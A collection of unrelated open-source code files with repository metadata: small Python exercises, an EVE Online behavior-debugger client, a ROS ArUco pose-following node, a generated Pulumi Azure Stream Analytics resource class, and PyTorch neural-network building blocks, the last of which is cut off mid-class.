9f948546652be4760b5d078808483f504f292773 | d1ab86d9a87c0f22a8a266455e130ce41c7bce30 | /codekata/string.py | 329d461f9f5528dd7ebf412dc116fa174b624b09 | [] | no_license | madhankmr/guvi | 0a4cca09aa449d352feedbfc8f2312b2e164de2b | eea3ff1e3f02fe2cd003432417924a9548f12cb9 | refs/heads/master | 2020-06-03T08:24:22.988728 | 2019-07-09T10:32:25 | 2019-07-09T10:32:25 | 191,355,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | S1,S2=input().split()
if (S1>=S2):
print(S1)
else:
print(S2)
| [
"[email protected]"
] | |
6c8b062cee0cd780d80f6ae73dd3510bd18e1fcc | 6eb097cccbc0e040eb940663f85ce7eacb2be95b | /Desafio061.py | fe389e9b9bf333e9d84a854ccc59923d3a836ef6 | [] | no_license | figueiredorodrigo/Exercicios-Guanabara | c7cdb534b3f7c2db0e2bffc2b4376af035213b3a | 621000882ab3aa080415bb04336fd1713ab85b5d | refs/heads/main | 2023-06-02T07:10:22.555624 | 2021-06-15T16:33:26 | 2021-06-15T16:33:26 | 376,381,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py | #Progressão aritmética com comand while
p1 = int(input('Primeeiro termo: '))
rz = int(input('Informe a razão da P.A: '))
tr = p1
cont = 1
while cont <= 10:
print(f' {tr} -> ', end= '')
tr += rz
cont += 1 | [
"[email protected]"
] | |
0457cef64ea7b68406f6e46a7669f6fc1dce58d8 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2518/49823/278350.py | 2cb366ad69dc313778213eda8c71db7c66cfe53f | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | def al(a,b):
    # NOTE(review): `l` is assigned but never used — dead variable.
    l=[]
    # Sort both lists so a single forward pointer into b suffices.
    a=sorted(a)
    b=sorted(b)
    # p: monotone pointer into b; r: running maximum distance.
    p,r=0,0
    for i in range(len(a)):
        # Advance p to the first b[p] >= a[i] (or the last index of b).
        while(b[p]<a[i] and p<len(b)-1):
            p+=1
        if(p==0):
            d=abs(b[p]-a[i])
        else:
            # Closest of the two bracketing candidates b[p-1] and b[p].
            d=min(abs(a[i]-b[p-1]),abs(b[p]-a[i]))
        r=max(r,d)
    # Prints the maximum, over elements of a, of the distance to the
    # nearest element of b.
    print(r)
if __name__ == '__main__':
    # Read two comma-separated integer lists (one per input line) and run al.
    first = [int(token) for token in input().split(',')]
    second = [int(token) for token in input().split(',')]
    al(first, second)
| [
"[email protected]"
] | |
cf1e3075185cefc817f86f6636ba6ca84b9a73ae | 2ff7e53d5e512cd762217ca54317982e07a2bb0c | /eve/devtools/script/behaviortools/clientdebugadaptors.py | 2a22a85a0875ed2b83664cddb9e4a59eb4130b2b | [] | no_license | nanxijw/Clara-Pretty-One-Dick | 66d3d69426642b79e8fd4cc8e0bec23adeeca6d6 | 50de3488a2140343c364efc2615cf6e67f152be0 | refs/heads/master | 2021-01-19T09:25:07.555284 | 2015-02-17T21:49:33 | 2015-02-17T21:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,637 | py | #Embedded file name: eve/devtools/script/behaviortools\clientdebugadaptors.py
import logging
from brennivin.messenger import Messenger
import eve.common.script.net.eveMoniker as moniker
from eve.devtools.script.behaviortools.debugwindow import BehaviorDebugWindow
import uthread2
logger = logging.getLogger(__name__)
# Notify-event names (registered with sm) used by the behavior debugger:
# an update push, and requests to attach/detach debuggers for entity IDs.
EVENT_BEHAVIOR_DEBUG_UPDATE = 'OnBehaviorDebugUpdate'
EVENT_BEHAVIOR_DEBUG_CONNECT_REQUEST = 'OnBehaviorDebugConnectRequest'
EVENT_BEHAVIOR_DEBUG_DISCONNECT_REQUEST = 'OnBehaviorDebugDisconnectRequest'
class UpdateListener(object):
    """Routes behavior-debug events to per-entity observers.

    Registers itself with the notify service (sm) at construction time and
    keeps one ClientBehaviorDebugger per debugged entity, keyed by itemID.
    """

    def __init__(self):
        self.messenger = Messenger()
        self.behaviorDebuggersByItemId = {}
        sm.RegisterForNotifyEvent(self, EVENT_BEHAVIOR_DEBUG_UPDATE)
        sm.RegisterForNotifyEvent(self, EVENT_BEHAVIOR_DEBUG_CONNECT_REQUEST)
        sm.RegisterForNotifyEvent(self, EVENT_BEHAVIOR_DEBUG_DISCONNECT_REQUEST)

    def AddObserverForItemId(self, itemId, handler):
        """Subscribe handler to updates for itemId, dropping any previous
        subscribers for that item first."""
        if itemId in self.messenger.signalsByMessageName:
            self.messenger.signalsByMessageName[itemId].clear()
        self.messenger.SubscribeToMessage(itemId, handler)

    def RemoveObserverForItemId(self, itemId, handler):
        """Unsubscribe handler from itemId, logging (not raising) failures."""
        try:
            self.messenger.UnsubscribeFromMessage(itemId, handler)
        except Exception:
            # Bug fix: was a bare `except:`, which also swallowed
            # SystemExit/KeyboardInterrupt.
            logger.error('Failed to remove observer itemID=%s handler=%s', itemId, handler)

    def OnBehaviorDebugUpdate(self, itemID, *args, **kwargs):
        """Fan a server-side debug update out to the observers of itemID."""
        self.messenger.SendMessage(itemID, *args, **kwargs)

    def TryConnectDebugger(self, itemID):
        """Attach a debugger to itemID; failures are logged, not raised."""
        try:
            debugger = ClientBehaviorDebugger(itemID)
            debugger.Connect()
            self.behaviorDebuggersByItemId[itemID] = debugger
        except Exception:
            # Bug fix: narrowed from a bare `except:`.
            logger.exception('failed to connect to debugger for itemID=%s', itemID)

    def OnBehaviorDebugConnectRequest(self, itemIDs):
        # Connect in sorted order so behavior is deterministic across runs.
        itemIDs = sorted(itemIDs)
        for itemID in itemIDs:
            self.TryConnectDebugger(itemID)

    def TryDisconnectDebugger(self, itemID):
        """Detach and forget the debugger for itemID; failures are logged."""
        try:
            debugger = self.behaviorDebuggersByItemId.pop(itemID)
            debugger.Disconnect()
        except Exception:
            # Bug fix: narrowed from a bare `except:` (pop raises KeyError
            # when no debugger is attached).
            logger.exception('failed to disconnect to debugger for itemID=%s', itemID)

    def OnBehaviorDebugDisconnectRequest(self, itemIDs):
        for itemID in itemIDs:
            self.TryDisconnectDebugger(itemID)

    def HasDebugger(self, itemID):
        """Return True if a debugger is currently attached to itemID."""
        return itemID in self.behaviorDebuggersByItemId
updateListener = UpdateListener()
class ClientBehaviorDebugger(object):
    """Client-side proxy for debugging one entity's behavior tree.

    ``Connect()`` registers for server updates, enables server-side debugging
    and opens a debug window; ``Disconnect()`` tears both down again.
    """

    def __init__(self, itemID):
        self.itemID = itemID
        self.tree = []
        self.treeMap = {}
        self.events = []
        self.debugWindow = None
        self.isConnected = False

    def Connect(self):
        """Enable server-side debugging for this entity and open the UI."""
        logger.debug('Debugger connecting to behavior of entity %s', self.itemID)
        updateListener.AddObserverForItemId(self.itemID, self.OnBehaviorDebugUpdate)
        entityLocation = moniker.GetEntityLocation()
        treeData = entityLocation.EnableBehaviorDebugging(self.itemID)
        self.isConnected = True
        # Build the window on a tasklet so Connect() returns promptly.
        uthread2.StartTasklet(self.SetupDebugTree, treeData)

    def Disconnect(self):
        """Disable server-side debugging and close the debug window."""
        logger.debug('Debugger disconnecting from behavior of entity %s', self.itemID)
        try:
            updateListener.RemoveObserverForItemId(self.itemID, self.OnBehaviorDebugUpdate)
            entityLocation = moniker.GetEntityLocation()
            entityLocation.DisableBehaviorDebugging(self.itemID)
            self.isConnected = False
            if self.debugWindow is not None:
                self.debugWindow.Close()
            sm.UnregisterForNotifyEvent(self, 'OnSessionChanged')
        except Exception:  # was a bare except: must not swallow SystemExit/KeyboardInterrupt
            logger.exception('Failed while disconnecting :(')

    def OnBehaviorDebugUpdate(self, events, taskStatuses, tasksSeen, blackboards, *args, **kwargs):
        # Updates can race with window teardown; drop them once the UI is gone.
        if self.debugWindow is None:
            return
        self.debugWindow.LoadEvents(events)
        self.debugWindow.UpdateStatuses(taskStatuses)
        self.debugWindow.UpdateTasksSeen(tasksSeen)
        self.debugWindow.LoadBlackboard(blackboards)

    def SetupDebugTree(self, treeData):
        """Open the debug window and populate it with the behavior tree."""
        self.debugWindow = BehaviorDebugWindow.Open(windowID='BehaviorDebugWindow_%d' % self.itemID)
        self.debugWindow.SetController(self)
        self.debugWindow.LoadBehaviorTree(treeData)
        sm.RegisterForNotifyEvent(self, 'OnSessionChanged')

    def IsConnected(self):
        return self.isConnected

    def OnSessionChanged(self, isRemote, sess, change):
        # Close the debugger UI when the client moves to another solar system.
        if 'solarsystemid2' in change:
            if self.debugWindow is not None:
                self.debugWindow.Close()
| [
"[email protected]"
] | |
bad0141d830a8379daeaf2e3cb693b8206344569 | f539c6b009b9e7964e8cd7b44963afef7b36b2e5 | /scripts/pose_aruco.py | e8378930bbe156d0c2d4ada6bf65384575e65d47 | [] | no_license | danielmessi13/pose_msgs | 8144eaf1c838a3178babd2ddfc8327a38863a7b7 | 990f18a9737e740d13adf6d40f955bac94298724 | refs/heads/master | 2020-08-22T14:16:51.892139 | 2019-10-20T19:12:05 | 2019-10-20T19:12:05 | 216,413,082 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,690 | py | #!/usr/bin/env python3
from pose_msgs.msg import TransformStampedCertainty
import rospy
from std_msgs.msg import Float64
from tf2_msgs.msg import TFMessage
import math
l_pose_x = 0
l_pose_y = 0
pose_x = 0
pose_y = 0
theta = 0
def callback(data):
    """Handle one /tf message: update marker poses, publish drive commands.

    Marker 'marker_id0' is treated as the leader/goal pose (l_pose_*, theta);
    any other marker updates the follower pose (pose_*). Every message then
    publishes the leader-follower distance on 'front_back' and a scaled
    heading error on 'left_right'.
    """
    # print("ID: " + data.transforms[0].child_frame_id)
    # print("X: " + str(data.transforms[0].transform.translation.x))
    # print("Y: " + str(data.transforms[0].transform.translation.y))
    # print("W (Theta): " + str(data.transforms[0].transform.rotation.w))
    global l_pose_x
    global pose_x
    global l_pose_y
    global pose_y
    global theta
    if data.transforms[0].child_frame_id == "marker_id0":
        l_pose_x = data.transforms[0].transform.translation.x
        l_pose_y = data.transforms[0].transform.translation.y
        orientation = data.transforms[0].transform.rotation
        # theta (yaw) comes back in radians from quaternion_to_euler's Z.
        (roll, pitch, theta) = quaternion_to_euler(orientation.x, orientation.y, orientation.z, orientation.w)
        # Flip the sign of y — presumably converting between the camera frame
        # and the robot frame; TODO confirm against the physical setup.
        if l_pose_y > 0:
            l_pose_y = (-1 * l_pose_y)
        else:
            l_pose_y = abs(l_pose_y)
    else:
        pose_x = data.transforms[0].transform.translation.x
        pose_y = data.transforms[0].transform.translation.y
        if pose_y > 0:
            pose_y = (-1 * pose_y)
        else:
            pose_y = abs(pose_y)
    # Proportional gain applied to the heading error before publishing.
    K_ANGLE = 20
    pub = rospy.Publisher('front_back', Float64, queue_size=512)
    pub2 = rospy.Publisher('left_right', Float64, queue_size=512)
    # Euclidean distance and bearing from follower to leader.
    distancia = abs(math.sqrt((l_pose_x - pose_x) ** 2 + (l_pose_y - pose_y) ** 2))
    arc_to_move = math.atan2(l_pose_y - pose_y, l_pose_x - pose_x)
    angle = (arc_to_move - theta) * K_ANGLE
    # print("Arco a se mover: " + str(arc_to_move))
    # print("Theta: " + str(theta))
    # print("Angulo: " + str(angle))
    # print(theta)
    pub.publish(Float64(distancia))
    pub2.publish(Float64(angle))
def listener_joy():
    """Initialize the ROS node, subscribe to /tf and block until shutdown.

    The original version assigned l_pose_x / l_pose_y / pose_x / pose_y as
    locals here; those were dead stores (they never touched the module-level
    globals used by callback), so they have been removed.
    """
    rospy.init_node('pose_aruco', anonymous=True)
    rospy.Subscriber("/tf", TFMessage, callback)
    rospy.spin()  # keep the node alive; callbacks fire on the subscriber thread
def quaternion_to_euler(x, y, z, w):
    """Convert a quaternion (x, y, z, w) to Euler angles.

    Returns (roll, pitch, yaw). Note the mixed units, kept for compatibility
    with existing callers: roll and pitch are in DEGREES, yaw is in RADIANS.
    """
    import math
    # Roll: rotation about the x axis, converted to degrees.
    sinr_cosp = 2.0 * (w * x + y * z)
    cosr_cosp = 1.0 - 2.0 * (x * x + y * y)
    roll = math.degrees(math.atan2(sinr_cosp, cosr_cosp))
    # Pitch: rotation about the y axis; clamp to [-1, 1] to avoid asin domain
    # errors from floating-point drift.
    sinp = max(-1.0, min(1.0, 2.0 * (w * y - z * x)))
    pitch = math.degrees(math.asin(sinp))
    # Yaw: rotation about the z axis, left in radians.
    siny_cosp = 2.0 * (w * z + x * y)
    cosy_cosp = 1.0 - 2.0 * (y * y + z * z)
    yaw = math.atan2(siny_cosp, cosy_cosp)
    return roll, pitch, yaw
if __name__ == '__main__':
    # ROSInterruptException is raised by rospy on shutdown (e.g. Ctrl-C);
    # exiting quietly is the intended behavior.
    try:
        listener_joy()
    except rospy.ROSInterruptException:
        pass
| [
"[email protected]"
] | |
e60c607287bab75ad3c8bd40437cacd67838444e | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/streamanalytics/v20200301/input.py | 3a86e730433d5039270923b5be2f82279ac23e72 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 10,175 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['InputInitArgs', 'Input']
@pulumi.input_type
class InputInitArgs:
    # NOTE: emitted by the Pulumi SDK Generator (see file header) — do not
    # hand-edit logic. Values live in pulumi's input-property table and are
    # accessed exclusively through pulumi.set/pulumi.get.
    def __init__(__self__, *,
                 job_name: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 input_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 properties: Optional[pulumi.Input[Union['ReferenceInputPropertiesArgs', 'StreamInputPropertiesArgs']]] = None):
        """
        The set of arguments for constructing a Input resource.
        :param pulumi.Input[str] job_name: The name of the streaming job.
        :param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
        :param pulumi.Input[str] input_name: The name of the input.
        :param pulumi.Input[str] name: Resource name
        :param pulumi.Input[Union['ReferenceInputPropertiesArgs', 'StreamInputPropertiesArgs']] properties: The properties that are associated with an input. Required on PUT (CreateOrReplace) requests.
        """
        pulumi.set(__self__, "job_name", job_name)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        # Optional arguments are only recorded when provided.
        if input_name is not None:
            pulumi.set(__self__, "input_name", input_name)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if properties is not None:
            pulumi.set(__self__, "properties", properties)
    @property
    @pulumi.getter(name="jobName")
    def job_name(self) -> pulumi.Input[str]:
        """
        The name of the streaming job.
        """
        return pulumi.get(self, "job_name")
    @job_name.setter
    def job_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "job_name", value)
    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group. The name is case insensitive.
        """
        return pulumi.get(self, "resource_group_name")
    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)
    @property
    @pulumi.getter(name="inputName")
    def input_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the input.
        """
        return pulumi.get(self, "input_name")
    @input_name.setter
    def input_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "input_name", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Resource name
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def properties(self) -> Optional[pulumi.Input[Union['ReferenceInputPropertiesArgs', 'StreamInputPropertiesArgs']]]:
        """
        The properties that are associated with an input. Required on PUT (CreateOrReplace) requests.
        """
        return pulumi.get(self, "properties")
    @properties.setter
    def properties(self, value: Optional[pulumi.Input[Union['ReferenceInputPropertiesArgs', 'StreamInputPropertiesArgs']]]):
        pulumi.set(self, "properties", value)
class Input(pulumi.CustomResource):
    # NOTE: emitted by the Pulumi SDK Generator (see file header) — do not
    # hand-edit logic. The two @overload __init__ signatures exist only for
    # type checkers; the real dispatch happens in the plain __init__ below.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 input_name: Optional[pulumi.Input[str]] = None,
                 job_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 properties: Optional[pulumi.Input[Union[pulumi.InputType['ReferenceInputPropertiesArgs'], pulumi.InputType['StreamInputPropertiesArgs']]]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        An input object, containing all information associated with the named input. All inputs are contained under a streaming job.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] input_name: The name of the input.
        :param pulumi.Input[str] job_name: The name of the streaming job.
        :param pulumi.Input[str] name: Resource name
        :param pulumi.Input[Union[pulumi.InputType['ReferenceInputPropertiesArgs'], pulumi.InputType['StreamInputPropertiesArgs']]] properties: The properties that are associated with an input. Required on PUT (CreateOrReplace) requests.
        :param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: InputInitArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        An input object, containing all information associated with the named input. All inputs are contained under a streaming job.

        :param str resource_name: The name of the resource.
        :param InputInitArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the (resource_name, args, opts) and keyword forms.
        resource_args, opts = _utilities.get_resource_args_opts(InputInitArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 input_name: Optional[pulumi.Input[str]] = None,
                 job_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 properties: Optional[pulumi.Input[Union[pulumi.InputType['ReferenceInputPropertiesArgs'], pulumi.InputType['StreamInputPropertiesArgs']]]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = InputInitArgs.__new__(InputInitArgs)

            __props__.__dict__["input_name"] = input_name
            if job_name is None and not opts.urn:
                raise TypeError("Missing required property 'job_name'")
            __props__.__dict__["job_name"] = job_name
            __props__.__dict__["name"] = name
            __props__.__dict__["properties"] = properties
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["type"] = None
        # Aliases keep URNs stable across provider/API-version renames.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:streamanalytics/v20200301:Input"), pulumi.Alias(type_="azure-native:streamanalytics:Input"), pulumi.Alias(type_="azure-nextgen:streamanalytics:Input"), pulumi.Alias(type_="azure-native:streamanalytics/v20160301:Input"), pulumi.Alias(type_="azure-nextgen:streamanalytics/v20160301:Input"), pulumi.Alias(type_="azure-native:streamanalytics/v20170401preview:Input"), pulumi.Alias(type_="azure-nextgen:streamanalytics/v20170401preview:Input")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(Input, __self__).__init__(
            'azure-native:streamanalytics/v20200301:Input',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'Input':
        """
        Get an existing Input resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = InputInitArgs.__new__(InputInitArgs)
        # Output-only properties start as None and are resolved by the engine.
        __props__.__dict__["name"] = None
        __props__.__dict__["properties"] = None
        __props__.__dict__["type"] = None
        return Input(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[Optional[str]]:
        """
        Resource name
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def properties(self) -> pulumi.Output[Any]:
        """
        The properties that are associated with an input. Required on PUT (CreateOrReplace) requests.
        """
        return pulumi.get(self, "properties")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        Resource type
        """
        return pulumi.get(self, "type")
| [
"[email protected]"
] | |
4ac21bfa5c8507abc4cb0dd4aba87afea74a988a | 1da112d29c98d7ed16d1eadff407a3801f8e9085 | /modeling/backbone_all/common.py | 3df13a2e92ef75e0eae067c53144d0c43f16087d | [] | no_license | Kelvin-001/Semantic-segmentation | 80529d5167810dcf073f1611cf311a8c61f6d71f | 3a57bb7049ba9a50729f3d3121aa079d2bc2affb | refs/heads/main | 2023-03-22T12:29:51.432593 | 2021-03-17T14:21:11 | 2021-03-17T14:21:11 | 348,682,887 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 19,038 | py | import math
from inspect import isfunction
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Linear, Conv2d, BatchNorm1d, BatchNorm2d, PReLU, ReLU, Sigmoid, Dropout, MaxPool2d, \
AdaptiveAvgPool2d, Sequential, Module
from collections import namedtuple
class Swish(nn.Module):
    """Swish activation (a.k.a. SiLU): ``x * sigmoid(x)``."""

    def forward(self, x):
        gate = torch.sigmoid(x)
        return gate * x
class HSigmoid(nn.Module):
    """Hard sigmoid: piecewise-linear sigmoid approximation, ``relu6(x + 3) / 6``."""

    def forward(self, x):
        shifted = x + 3.0
        return F.relu6(shifted, inplace=True) / 6.0
class HSwish(nn.Module):
    """Hard swish: ``x * relu6(x + 3) / 6``.

    Args:
        inplace: whether the internal relu6 may operate in place.
    """

    def __init__(self, inplace=False):
        super(HSwish, self).__init__()
        self.inplace = inplace

    def forward(self, x):
        gate = F.relu6(x + 3.0, inplace=self.inplace)
        return x * gate / 6.0
def get_activation_layer(activation):
    # Build an activation layer from a zero-arg factory function, a name
    # string, or an already-constructed nn.Module (returned as-is).
    # NOTE(review): this definition is shadowed by the later two-argument
    # get_activation_layer(activation, out_channels) in this module, so
    # module-level callers resolve to that version instead.
    # NOTE(review): the "identity" branch references Identity, which is not
    # defined in this module — verify it is provided elsewhere before use.
    assert (activation is not None)
    if isfunction(activation):
        return activation()
    elif isinstance(activation, str):
        if activation == "relu":
            return nn.ReLU(inplace=True)
        elif activation == "relu6":
            return nn.ReLU6(inplace=True)
        elif activation == "swish":
            return Swish()
        elif activation == "hswish":
            return HSwish(inplace=True)
        elif activation == "sigmoid":
            return nn.Sigmoid()
        elif activation == "hsigmoid":
            return HSigmoid()
        elif activation == "identity":
            return Identity()
        else:
            raise NotImplementedError()
    else:
        assert (isinstance(activation, nn.Module))
        return activation
class InterpolationBlock(nn.Module):
    # Fixed-configuration wrapper around F.interpolate (up-/downsampling).
    def __init__(self,
                 scale_factor,
                 mode="bilinear",
                 align_corners=True):
        super(InterpolationBlock, self).__init__()
        self.scale_factor = scale_factor
        self.mode = mode
        self.align_corners = align_corners
    def forward(self, x):
        return F.interpolate(
            input=x,
            scale_factor=self.scale_factor,
            mode=self.mode,
            align_corners=self.align_corners)
    def __repr__(self):
        s = "{name}(scale_factor={scale_factor}, mode={mode}, align_corners={align_corners})"
        return s.format(
            name=self.__class__.__name__,
            scale_factor=self.scale_factor,
            mode=self.mode,
            align_corners=self.align_corners)
    def calc_flops(self, x):
        # Rough FLOP estimate for one interpolation pass; requires batch == 1.
        assert (x.shape[0] == 1)
        if self.mode == "bilinear":
            num_flops = 9 * x.numel()
        else:
            num_flops = 4 * x.numel()
        num_macs = 0
        return num_flops, num_macs
class IBN(nn.Module):
    # Instance-Batch Normalization: splits channels into two groups and runs
    # InstanceNorm on one and BatchNorm on the other, then re-concatenates.
    def __init__(self,
                 channels,
                 first_fraction=0.5,
                 inst_first=True):
        super(IBN, self).__init__()
        self.inst_first = inst_first
        # first_fraction controls how many channels go into the first group.
        h1_channels = int(math.floor(channels * first_fraction))
        h2_channels = channels - h1_channels
        self.split_sections = [h1_channels, h2_channels]
        if self.inst_first:
            self.inst_norm = nn.InstanceNorm2d(
                num_features=h1_channels,
                affine=True)
            self.batch_norm = nn.BatchNorm2d(num_features=h2_channels)
        else:
            self.batch_norm = nn.BatchNorm2d(num_features=h1_channels)
            self.inst_norm = nn.InstanceNorm2d(
                num_features=h2_channels,
                affine=True)
    def forward(self, x):
        x1, x2 = torch.split(x, split_size_or_sections=self.split_sections, dim=1)
        if self.inst_first:
            x1 = self.inst_norm(x1.contiguous())
            x2 = self.batch_norm(x2.contiguous())
        else:
            x1 = self.batch_norm(x1.contiguous())
            x2 = self.inst_norm(x2.contiguous())
        x = torch.cat((x1, x2), dim=1)
        return x
class Flatten(Module):
    """Flatten every dimension after the batch dimension into one."""

    def forward(self, input):
        batch_size = input.size(0)
        return input.view(batch_size, -1)
def l2_norm(input, axis=1):
    """Scale `input` to unit L2 norm along `axis` (dimensions are kept)."""
    magnitude = torch.norm(input, 2, axis, True)
    return input / magnitude
class SEModule(Module):
    # Squeeze-and-Excitation channel attention implemented with 1x1 convs:
    # global average pool -> bottleneck (channels/reduction) -> sigmoid gate.
    def __init__(self, channels, reduction):
        super(SEModule, self).__init__()
        self.avg_pool = AdaptiveAvgPool2d(1)
        self.fc1 = Conv2d(channels, channels // reduction, kernel_size=1, padding=0, bias=False)
        nn.init.xavier_uniform_(self.fc1.weight.data)
        self.relu = ReLU(inplace=True)
        self.fc2 = Conv2d(channels // reduction, channels, kernel_size=1, padding=0, bias=False)
        self.sigmoid = Sigmoid()
    def forward(self, x):
        module_input = x
        x = self.avg_pool(x)
        x = self.fc1(x)
        x = self.relu(x)
        x = self.fc2(x)
        x = self.sigmoid(x)
        # Re-weight the input channels by the learned attention.
        return module_input * x
class bottleneck_IR(Module):
    # Improved-residual bottleneck (IR-ResNet style): BN -> 3x3 conv -> PReLU
    # -> strided 3x3 conv -> BN on the residual branch, plus an identity (or
    # 1x1-conv projection) shortcut.
    def __init__(self, in_channel, depth, stride=1):
        super(bottleneck_IR, self).__init__()
        if in_channel == depth:
            # MaxPool2d(1, stride) only subsamples spatially to match stride.
            self.shortcut_layer = MaxPool2d(1, stride)
        else:
            self.shortcut_layer = Sequential(
                Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth))
        self.res_layer = Sequential(
            BatchNorm2d(in_channel),
            Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),
            PReLU(depth),
            Conv2d(depth, depth, (3, 3), stride, 1, bias=False),
            BatchNorm2d(depth))
    def forward(self, x):
        shortcut = self.shortcut_layer(x)
        res = self.res_layer(x)
        return res + shortcut
class bottleneck_IR_SE(Module):
    # bottleneck_IR variant with a Squeeze-and-Excitation block (reduction 16)
    # appended to the residual branch.
    def __init__(self, in_channel, depth, stride=1):
        super(bottleneck_IR_SE, self).__init__()
        if in_channel == depth:
            self.shortcut_layer = MaxPool2d(1, stride)
        else:
            self.shortcut_layer = Sequential(
                Conv2d(in_channel, depth, (1, 1), stride, bias=False),
                BatchNorm2d(depth))
        self.res_layer = Sequential(
            BatchNorm2d(in_channel),
            Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False),
            PReLU(depth),
            Conv2d(depth, depth, (3, 3), stride, 1, bias=False),
            BatchNorm2d(depth),
            SEModule(depth, 16)
        )
    def forward(self, x):
        shortcut = self.shortcut_layer(x)
        res = self.res_layer(x)
        return res + shortcut
from torch.nn.modules.utils import _pair
class SplAtConv2d(nn.Module):
    """Split-Attention Conv2d (ResNeSt style).

    Produces channels*radix feature maps, splits them into `radix` groups,
    pools their sum, and re-weights each group with attention from rSoftMax.
    """
    def __init__(self, in_channels, channels, kernel_size, stride=(1, 1), padding=(0, 0),
                 dilation=(1, 1), groups=1, bias=True,
                 radix=2, reduction_factor=4,
                 rectify=False, rectify_avg=False, norm_layer=None,
                 dropblock_prob=0.0, **kwargs):
        super(SplAtConv2d, self).__init__()
        padding = _pair(padding)
        self.rectify = rectify and (padding[0] > 0 or padding[1] > 0)
        self.rectify_avg = rectify_avg
        # Attention bottleneck width, floored at 32 channels.
        inter_channels = max(in_channels*radix//reduction_factor, 32)
        self.radix = radix
        self.cardinality = groups
        self.channels = channels
